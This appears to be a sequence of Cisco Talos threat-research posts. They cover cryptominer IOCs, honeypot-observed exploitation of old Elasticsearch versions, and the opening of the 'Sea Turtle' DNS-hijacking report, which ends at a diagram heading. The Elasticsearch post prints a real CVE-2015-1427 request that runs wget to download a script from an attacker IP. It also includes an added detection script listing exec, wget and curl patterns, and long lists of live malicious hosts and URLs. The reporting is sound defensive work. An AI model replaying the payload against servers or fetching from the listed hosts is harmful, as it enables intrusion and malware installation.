\n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1545149724820000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1545149724823000>). \n \n\n\n### IOCs\n\n#### \n\n#### Rocke\n\nIPs: \n121[.]126[.]223[.]211 \n142[.]44[.]215[.]177 \n144[.]217[.]61[.]147 \n118[.]24[.]150[.]172 \n185[.]133[.]193[.]163 \n \nDomains: \nxmr.enjoytopic[.]tk \nd.paloaltonetworks[.]tk \nthreatpost[.]tk \n3g2upl4pq6kufc4m[.]tk \nscan.3g2upl4pq6kufc4m[.]tk \ne3sas6tzvehwgpak[.]tk \nsample.sydwzl[.]cn \nblockbitcoin[.]com \nscan.blockbitcoin[.]tk \ndazqc4f140wtl[.]cloudfront[.]net \nd3goboxon32grk2l[.]tk \nenjoytopic[.]tk \nrealtimenews[.]tk \n8282[.]space \n3389[.]space \nsvss[.]space \nenjoytopic[.]esy[.]es \nlienjoy[.]esy[.]es \nd3oxpv9ajpsgxt[.]cloudfront[.]net \nd3lvemwrafj7a7[.]cloudfront[.]net \nd1ebv77j9rbkp6[.]enjoytopic[.]com \nswb[.]one \nd1uga3uzpppiit[.]cloudfront[.]net \nemsisoft[.]enjoytopic[.]tk \nejectrift[.]censys[.]xyz \nscan[.]censys[.]xyz \napi[.]leakingprivacy[.]tk \nnews[.]realnewstime[.]xyz \nscan[.]realnewstime[.]xyz \nnews[.]realtimenews[.]tk \nscanaan[.]tk \nwww[.]qicheqiche[.]com \n \nURLs: \nhxxps://github[.]com/yj12ni \nhxxps://github[.]com/rocke \nhxxps://github[.]com/freebtcminer/ \nhxxps://github[.]com/tightsoft \nhxxps://raw[.]githubusercontent[.]com/ghostevilxp \nhxxp://www[.]qicheqiche[.]com \nhxxp://123[.]206[.]13[.]220:8899 \nhxxps://gitee[.]com/c-888/ \nhxxp://gitlab[.]com/c-18 \nhxxp://www[.]ssvs[.]space/root[.]bin \nhxxp://a[.]ssvs[.]space/db[.]sh \nhxxp://a[.]ssvs[.]space/cf[.]cf \nhxxp://a[.]ssvs[.]space/pluto \nhxxp://ip[.]ssvs[.]space/xm64 \nhxxp://ip[.]ssvs[.]space/wt[.]conf 
hxxp://ip[.]ssvs[.]space/mr[.]sh
hxxp://a[.]ssvs[.]space/logo[.]jpg
hxxp://a[.]sydwzl[.]cn/root[.]bin
hxxp://a[.]sydwzl[.]cn/x86[.]bin
hxxp://a[.]sydwzl[.]cn/bar[.]sh
hxxp://a[.]sydwzl[.]cn/crondb
hxxp://a[.]sydwzl[.]cn/pools[.]txt
hxxps://pastebin[.]com/raw/5bjpjvLP
hxxps://pastebin[.]com/raw/Fj2YdETv
hxxps://pastebin[.]com/raw/eRkrSQfE
hxxps://pastebin[.]com/raw/Gw7mywhC
hxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg
hxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg
hxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg
hxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg
hxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg
hxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg
hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408

SHA-256:
55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin
00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin
cdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh
959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf
d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64
da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin
2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf
b1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh
7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin
904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg
f792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin
dcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin
3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh
a598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db
74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt

Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:
17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0
4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86

Wallets
rocke@live.cn
44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W
44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3
45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV
88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto

#### 8220 Gang

45[.]32[.]39[.]40:8220
45[.]77[.]24[.]16
54[.]37[.]57[.]99:8220
67[.]21[.]81[.]179:8220
67[.]231[.]243[.]10:8220
98[.]142[.]140[.]13:8220
98[.]142[.]140[.]13:3333
98[.]142[.]140[.]13:8888
104[.]129[.]171[.]172:8220
104[.]225[.]147[.]196:8220
128[.]199[.]86[.]57:8220
142[.]4[.]124[.]50:8220
142[.]4[.]124[.]164:8220
158[.]69[.]133[.]17:8220
158[.]69[.]133[.]18:8220
158[.]69[.]133[.]20:3333
162[.]212[.]157[.]244:8220
165[.]227[.]215[.]212:8220
185[.]82[.]218[.]206:8220
192[.]99[.]142[.]226:8220
192[.]99[.]142[.]227
192[.]99[.]142[.]232:8220
192[.]99[.]142[.]235:8220
192[.]99[.]142[.]240:8220
192[.]99[.]142[.]248:8220
192[.]99[.]142[.]249:3333
192[.]99[.]142[.]251:80
192[.]99[.]56[.]117:8220
195[.]123[.]224[.]186:8220
198[.]181[.]41[.]97:8220
202[.]144[.]193[.]110:3333
hxxps://github[.]com/MRdoulestar/whatMiner

1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13
e2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e
31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1
cb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35
cfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e
efbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803
384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52

Samples associated with whatMiner:
f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c
1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04
241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f

Wallets
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S

#### Tor2mine

107[.]181[.]160[.]197
107[.]181[.]174[.]248
107[.]181[.]187[.]132
asq[.]r77vh0[.]pw
194[.]67[.]204[.]189
qm7gmtaagejolddt[.]onion[.]to
res1[.]myrms[.]pw
hxxps://gitlab[.]com/Shtrawban
rig[.]zxcvb[.]pw
back123[.]brasilia[.]me

91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe
44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe
3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe
c3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe
4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1
904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat
4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta
af780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta
cc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1
ee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta
a7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat
0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php
e0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat
b2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1
18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe
112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1
e1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta
61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1
f1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat
cce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe

#### Uncategorized groups

188[.]166[.]38[.]137
91[.]121[.]87[.]10
94[.]23[.]206[.]130

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg

_Post metadata: "Connecting the dots between recently active cryptominers", Cisco Talos blog; published 2018-12-18, modified 2018-12-18; CVE list: CVE-2018-11776; CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/); source: <http://feedproxy.google.com/~r/feedburner/Talos/~3/DemsFFZIKpI/cryptomining-campaigns-2018.html>._

## Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters

_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._

## Executive Summary

Cisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters.
These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads.

## Introduction

Through ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots.

For example, a CVE-2015-1427 request seen by the honeypot:

```json
{
  "size": 1,
  "script_fields": {
    "lupin": {
      "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\").getText()"
    }
  }
}
```

The most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms.
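The request above is one sample. As an added example (not code from the Talos post), the Python below walks an Elasticsearch 1.x search body, reports every place script text is supplied, and escalates when that text reaches for JVM reflection or process execution the way the quoted request does. The request bodies are constructed for this example (the download host in the exploit-shaped sample is a placeholder, not the address from the post); the key names are the script-bearing keys of the 1.x search API.

```python
"""Flag Elasticsearch 1.x search requests that carry inline script text.

Added example, not code from the Talos post. It walks a request body,
records every position where script material is supplied, and marks the
request as exploit-shaped when that script text reaches for JVM
reflection or process execution, which is what the CVE-2014-3120 and
CVE-2015-1427 requests seen in the honeypot do.
"""
import json
import re
from typing import Any, Dict, List

# Keys under which the 1.x search API accepts script text.
SCRIPT_KEYS = {"script", "script_fields", "script_score", "scripted_metric"}

# Tokens a search-time script has no business containing. The first three
# come straight from the exploit shape quoted in the post; the rest are the
# obvious siblings a defender would want covered.
SUSPICIOUS = re.compile(
    r"class\.forName|java\.lang\.Runtime|getRuntime\(\)|ProcessBuilder|"
    r"\.exec\(|/bin/(?:ba)?sh|\bwget\b|\bcurl\b",
    re.IGNORECASE,
)


def _walk(node: Any, path: str, hits: List[Dict[str, Any]]) -> None:
    """Depth-first walk; a script-bearing key is recorded and not descended."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}/{key}"
            if key in SCRIPT_KEYS:
                # Stringify so {"script": "..."} and {"script_fields": {...}}
                # are inspected the same way.
                text = value if isinstance(value, str) else json.dumps(value)
                hits.append({
                    "path": here,
                    "suspicious": bool(SUSPICIOUS.search(text)),
                    "snippet": text[:80],
                })
                continue
            _walk(value, here, hits)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            _walk(item, f"{path}[{index}]", hits)


def inspect_search_body(body: str) -> Dict[str, Any]:
    """Classify one request body.

    verdict is "unparseable", "clean" (no scripting), "script" (scripting
    used, nothing alarming in it) or "exploit" (script text references
    reflection / process execution).
    """
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return {"verdict": "unparseable", "hits": []}
    hits: List[Dict[str, Any]] = []
    _walk(parsed, "", hits)
    if not hits:
        verdict = "clean"
    elif any(hit["suspicious"] for hit in hits):
        verdict = "exploit"
    else:
        verdict = "script"
    return {"verdict": verdict, "hits": hits}


# Constructed sample bodies. "exploit_shape" mirrors the request quoted in
# the post, with the download URL replaced by a placeholder host.
SAMPLE_BODIES = {
    "exploit_shape": r'''{
  "size": 1,
  "script_fields": {
    "lupin": {
      "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://example.invalid/uuu.sh -P /tmp\").getText()"
    }
  }
}''',
    "benign_script": '{"query": {"match_all": {}}, "script_fields": {"double_price": {"script": "doc[\'price\'].value * 2"}}}',
    "plain_query": '{"size": 1, "query": {"match_all": {}}}',
    "garbage": "not json at all",
}


def classify_samples(bodies: Dict[str, str] = SAMPLE_BODIES) -> Dict[str, str]:
    """Return {name: verdict} for a batch of request bodies."""
    return {name: inspect_search_body(body)["verdict"] for name, body in bodies.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:14s} -> {verdict}")
```

The check is meant to run over request bodies captured at a reverse proxy or from Elasticsearch's own slow/access logging, where the "script" verdict is worth a look and the "exploit" verdict is worth an alert. It is a detection aid only; the fix the post's conclusion calls for is removing the capability, which in the 1.x line is the `script.disable_dynamic: true` setting in elasticsearch.yml (my note, not something the post spells out), or upgrading past 1.4.2.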
The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs.

This bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary.

Talos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners.

A third actor attempts to download a file named "LinuxT" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures.

As part of our research, we observed that, in some cases, hosts that attempted to download the "LinuxT" sample also dropped payloads that executed the command "echo 'qq952135763.'" This behavior has been seen in Elasticsearch error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions.

_"About Me" page of the attacker's personal website linking to the same QQ account number as in the command above._

This website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to GitHub or Atlassian.

_Attacker's Gitee page._

Although the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on the Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums.

Our honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both "echo 'qq952135763'" and "echo '952135763,'" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the "LinuxT" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one.

The three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an "rm *" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands.

## Conclusion

Talos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the "LinuxT" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases.

## Coverage

The following SNORT® rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

**CVE-2014-3120:** 33830, 36256, 44690

**CVE-2015-1427:** 33814, 36067

**CVE-2017-10271:** 45304

**CVE-2018-7600:** 46316

**CVE-2018-1273:** 46473

Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

## IOCs:

**First Actor:**

**Attacking IP addresses:**

101[.]200[.]48[.]68
117[.]205[.]7[.]194
107[.]182[.]183[.]206
124[.]43[.]19[.]159
139[.]99[.]131[.]57
179[.]50[.]196[.]228
185[.]165[.]116[.]144
189[.]201[.]192[.]242
191[.]189[.]30[.]112
192[.]210[.]198[.]50
195[.]201[.]169[.]194
216[.]15[.]146[.]34
43[.]240[.]65[.]121
45[.]76[.]136[.]196
45[.]76[.]178[.]34
52[.]8[.]60[.]118
54[.]70[.]161[.]251
139[.]159[.]218[.]82

**IP addresses and ports hosting malware:**

45[.]76[.]122[.]92:8506
207[.]148[.]70[.]143:8506

**SHA256 of delivered malware:**

bbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415
e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c
2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123
9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c
5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90
7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3

**Second Actor:**

**Attacking IP address:**

202[.]109[.]143[.]110

**IP address and port hosting malware:**

216[.]176[.]179[.]106:9090

**SHA256 of delivered malware:**

bbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415

**Third Actor:**

**Attacking IP addresses:**

125[.]231[.]139[.]75
36[.]235[.]171[.]244

**IP addresses linked to QQ account, but not delivering malware:**

121[.]207[.]227[.]84
125[.]77[.]30[.]184

**IP address and port hosting malware:**

104[.]203[.]170[.]198:5522

**SHA256 of malware hosted on above IP address:**

7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b
dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500
e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc
d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba
709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e
830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a

**Remaining actors:**

**Attacking IP addresses:**

111[.]19[.]78[.]4
15[.]231[.]235[.]194
221[.]203[.]81[.]226
111[.]73[.]45[.]90
121[.]207[.]227[.]84
125[.]77[.]30[.]184

_Post metadata: "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", Cisco Talos blog; published 2019-02-26, modified 2019-03-01; CVE list: CVE-2014-3120, CVE-2015-1427, CVE-2017-10271, CVE-2018-1273, CVE-2018-7600; CVSS 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/); source: <http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html>._

[Image](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)

_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney](<https://twitter.com/kpyke>) and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._

_Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House. We thank them for their assistance._

## Preface

This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have in the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.

## Executive Summary

Cisco Talos has discovered a new cyber threat campaign that we are calling "Sea Turtle," which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign.
We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems.

The actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24, 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names.

In the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, which we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how the actors were able to perform DNS hijacking of their primary victims by first targeting these third-party entities.

We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology.

The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organization that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed.

This post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen.

### Background on Domain Name Services and records management

The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded.

The first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to log in to the DNS provider from the client side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will.

The second way to access DNS records is through a DNS registrar, sometimes called registrar operators. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as "a means of interaction between a registrar's applications and registry applications." If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar.

The third approach to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) ".com." All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organizations that manage different parts of the domain registry root. The domain registry root is stored on 13 "named authorities in the delegation data for the root zone," according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>).

Finally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, "There are no signs of lost integrity or compromise of the content of the root [server] zone…There are no signs of clients having received unexpected responses from root servers."

### Assessed Sea Turtle DNS hijacking methodology

It is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle:

 1. Established a means to control the DNS records of the target.
 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.
 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.

The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals.

### Redirection Attack Methodology Diagram

